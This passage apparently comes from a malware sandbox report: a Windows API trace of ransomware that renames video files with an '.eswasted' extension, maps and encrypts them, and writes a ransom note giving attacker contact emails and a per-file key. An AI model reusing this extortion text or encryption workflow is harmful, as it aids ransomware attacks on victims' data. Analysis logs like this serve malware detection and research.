lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0081.930] SetEndOfFile (hFile=0x118) returned 1 [0081.930] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.930] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0081.931] lstrcpyW (in: lpString1=0x4d9216, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.931] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hWmaH7KTnB.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hwmah7ktnb.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hWmaH7KTnB.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hwmah7ktnb.mkv.eswasted")) returned 1 [0081.931] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hWmaH7KTnB.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hwmah7ktnb.mkv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0081.932] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0081.932] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x184ee [0081.932] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x184ee) returned 0xb10000 [0081.932] CloseHandle (hObject=0x110) returned 1 [0081.941] UnmapViewOfFile (lpBaseAddress=0xb10000) returned 1 [0081.942] CloseHandle (hObject=0x100) returned 1 [0081.942] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ef440 [0081.942] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e6078) returned 1 [0081.943] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x1b8, pbBuffer=0x4ef488 | out: pbBuffer=0x4ef488) returned 1 [0081.943] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0081.943] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e6078) returned 1 [0081.944] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0081.944] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0081.955] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0081.955] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0081.955] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0081.955] _snwprintf (in: _Dest=0x4e9fd8, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]mW5PTXlzoDtLzM0I5MhZIqVPgZOS1ZAdZsOZPYYpzEKrjbFPyI8ix1yWH/8rs5kx\r\nqgTNS4NGqxuD9bJPQ9IFfRYSBsRlcfKqto+2Sf2CORGS0A4uslWtC2tXvpWw1Y4z\r\nzONf1HSfR0gGv1v7pIgOXXGDZWz80qIHD2nTgFmyLPqR6umjWa/SNmkBOh6bpjUf\r\nMNJ0CqLVsZ1FQuzQgCMIG2GvIUvTK+djgf1+p+9aoEwk1LS5rrIW9OPqVFfGMljr\r\nJy9QfpAeXmsOQJvoUfeiaBVx0tpg9VzNkfLlvlkq8jDnPMutgXCaX1dZbfOKt7Ye\r\nfoCCG75o7YC+CprR9xPmyTD0v87ijVk1SLFkT3UB57mwW4wN/w6pEytmlQMRXHCL\r\nU9iKKPmdi24ux7/LenhmN2L+ItxPwNXL9zAz/PoUAAZVQnfyww1QeIqzVbH+PW82\r\nzgSDXqOpmhZ3HGs+/C49JiHj6QWyYYkxFM/InKeapQCccSNF2/MEx5tQUxMxhEQk\r\niCPafHSuFgiGkRE2YxqaQarjnruw7UF1EAT7lnrWnGOH5dAue0KPoym2a4Uu45aX\r\n549FPdGYHptmWEaZyvM4gz1+EtcrF+mmG5saJStphUW8trAgPYcWNurPlJhdSMuR\r\npuSmg1gDlT+RScToFImLKifvImavtY7WZs5YYwxoiK5=[end_key]\r\nKEEP IT\r\n") returned 990 [0081.955] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0081.955] WriteFile (in: hFile=0x118, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0081.955] SetEndOfFile (hFile=0x118) returned 1 [0081.958] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0081.958] CloseHandle (hObject=0x118) returned 1 [0082.038] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0082.038] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4df9a8 | out: hHeap=0x4a0000) returned 1 [0082.038] _aulldvrm () returned 0x0 [0082.038] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0082.039] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0082.039] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.039] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\O0NKJv1.mkv") returned 52 [0082.039] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x272) returned 0x4d91a8 [0082.039] lstrcpyW (in: lpString1=0x4d9210, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.039] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.039] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0082.040] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.040] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.040] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\O0NKJv1.mkv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\o0nkjv1.mkv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0082.041] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0082.042] SetEndOfFile (hFile=0x118) returned 1 [0082.042] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.042] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.042] lstrcpyW (in: lpString1=0x4d9210, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.042] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\O0NKJv1.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\o0nkjv1.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\O0NKJv1.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\o0nkjv1.mkv.eswasted")) returned 1 [0082.042] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\O0NKJv1.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\o0nkjv1.mkv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0082.043] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0082.043] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x67cf [0082.043] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x67cf) returned 0x2d0000 [0082.043] CloseHandle (hObject=0x100) returned 1 [0082.045] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0082.045] CloseHandle (hObject=0x110) returned 1 [0082.045] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ddfd8 [0082.045] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0082.046] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de020 | out: pbBuffer=0x4de020) returned 1 [0082.046] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.046] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0082.047] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0082.047] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.057] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4de1e0 [0082.057] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0082.057] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.057] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]WtEhTgb6p5+XrAWKvrQfvlHtP0nS3+wmmD1SkEH5wfyKflJqzAK+SuAu2wtzJbvp\r\nHcKTKm2+0/9SrbYpKxFlF+hFsMStngh5Nwu0atK9zeSCIv93S7RwzvodnXkIX4T3\r\n8i+jb++tbJhyIIRHazHU3rwigFefx7dTuDfJ27pLUDMnzr5cqXwafWfE1K85QNT8\r\n9/GXcd+KmN4ls7dKfQjvTrGOs3j6moZA5HhQzOnfQjkYxQSqx23Von3YnAHPoZrz\r\nZebqoTcs71fRAtd0FhllBWQ+oqgdL3CYspuDqa+Sdyf7sWyiS4TPJKvcz7wdYLkc\r\ne7+ETka9cbNznBtlg3dTlaHMJklM8S332dp2/hbM2x5on6PzWBssvJd1rClVW/0w\r\nEhNLD8dICj2JSwBtnAoqHGeYvPGCM56QRBJEC3qctrWO4KP3NigzaiRPVA224K7U\r\nFK9VicyE1Idu3xCNjDHMJA0qM+nBBapqTKXmKULVbtEO0SMv598H0iUj2zp1dAy6\r\nwr3LUqIXUb0p+Yl4zfB8uSQyU06U1zPxu417IJU1QKgTQFfjErmm42zd2N2Npf3f\r\nHEyo/5hJiKuPg/7ItOxix6AflcVSIV+D1zPutq+0zg330/2bKxw73jnZA6OSVp9D\r\nC5pqsvnx/KW4Sx3YWLIvEA+sYk7C16UAXpd+5YFBe85=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.057] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de1e0 | out: hHeap=0x4a0000) returned 1 [0082.057] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0082.057] SetEndOfFile (hFile=0x118) returned 1 [0082.059] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.059] CloseHandle (hObject=0x118) returned 1 [0082.061] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0082.061] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dfa70 | out: hHeap=0x4a0000) returned 1 [0082.061] _aulldvrm () returned 0x0 [0082.061] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0082.062] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0082.062] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.062] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\p_Qez12Z5_aSmAkuUL-.avi") returned 64 [0082.062] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28a) returned 0x4d91a8 [0082.062] lstrcpyW (in: lpString1=0x4d9228, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.062] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.062] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0082.063] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.063] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.063] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\p_Qez12Z5_aSmAkuUL-.avi.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p_qez12z5_asmakuul-.avi.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0082.063] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0082.064] SetEndOfFile (hFile=0x118) returned 1 [0082.064] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.064] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.064] lstrcpyW (in: lpString1=0x4d9228, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.064] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\p_Qez12Z5_aSmAkuUL-.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p_qez12z5_asmakuul-.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\p_Qez12Z5_aSmAkuUL-.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p_qez12z5_asmakuul-.avi.eswasted")) returned 1 [0082.065] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\p_Qez12Z5_aSmAkuUL-.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p_qez12z5_asmakuul-.avi.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0082.065] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0082.065] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0xbfee [0082.066] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbfee) returned 0x2d0000 [0082.066] CloseHandle (hObject=0x110) returned 1 [0082.069] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0082.106] CloseHandle (hObject=0x100) returned 1 [0082.106] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ef6d0 [0082.106] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0082.107] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef718 | out: pbBuffer=0x4ef718) returned 1 [0082.107] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.108] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0082.108] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0082.108] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.117] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0082.117] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef6d0 | out: hHeap=0x4a0000) returned 1 [0082.117] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0082.117] _snwprintf (in: _Dest=0x4e9fd8, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]YYI21wloK75T0lUNqYMCsCrktRPdrAsFlU9xq6xBbeb1QwLobZ7Uq234r3keSxvy\r\nfUTEMMqVcNtUizrJzLDrTO2QPfwmCFLbUQpBx+J8AMjDqCuxxIwjy4pBKE2nuOAg\r\nqDDXGPbrcpfvLCPFPdoVqfNiVztpZbHS/hzyS4iG18VGHOYwicrbzL8R3nIlm/0M\r\nA99C6p4kn4zvYkWYs1kG8p/xGaqvCUdq8ExBngtRWCTyru+/jJOoDgi8GEhZnEvm\r\noPiyfSKDc9ztm//UNW9RwF6rOM42lGB62cHjcUulWfoug4oibW/7werHnU/ALCOJ\r\nMoA++Bkrl7ZKyLBaBJsIfFMt9E688MYS/hCEBbaRzEc3JoIpSEk6e1u+ba/3uiSj\r\nmhT4PG52FwyhnpdqRaQzLr2x20R6SYv2csTJ7mDm44EOyN/9P9Ci7MC4lAdk3P0c\r\nmaKfZvajK/e7p8pmKDy3je1/oNpJew9WR+TAddvL8do1xmIcY9QjQ/hcGzyGBv1t\r\nT56dzx8B5F5wh9La7x0DxDZhbjeqCHpg+N72g/454zSySQLaC2x9USSM48qvoeRF\r\nOHEz7cJuN5ZjzTaaNtH/iCoTIYmcaXtlqJPsvxmeFpnm84al9EYBZCyD8YATroju\r\nC5shdG3mcO5naLjPZizwZFYcd09pVUwUVE7FbCQ+C9A=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.117] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0082.117] WriteFile (in: hFile=0x118, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0082.117] SetEndOfFile (hFile=0x118) returned 1 [0082.162] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0082.162] CloseHandle (hObject=0x118) returned 1 [0082.164] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0082.164] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fa728 | out: hHeap=0x4a0000) returned 1 [0082.164] _aulldvrm () returned 0x0 [0082.164] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0082.165] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0082.165] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.165] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\7rREBTSUi-MptldKO3.flv") returned 77 [0082.165] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a4) returned 0x4d91a8 [0082.165] lstrcpyW (in: lpString1=0x4d9242, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.165] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.165] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0082.166] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.166] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\7rREBTSUi-MptldKO3.flv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\7rrebtsui-mptldko3.flv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0082.173] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0082.174] SetEndOfFile (hFile=0x118) returned 1 [0082.174] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.174] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.174] lstrcpyW (in: lpString1=0x4d9242, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.174] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\7rREBTSUi-MptldKO3.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\7rrebtsui-mptldko3.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\7rREBTSUi-MptldKO3.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\7rrebtsui-mptldko3.flv.eswasted")) returned 1 [0082.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_uSKKl0fllwwk\\7rREBTSUi-MptldKO3.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_uskkl0fllwwk\\7rrebtsui-mptldko3.flv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0082.176] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0082.176] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x14966 [0082.176] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14966) returned 0xb10000 [0082.176] CloseHandle 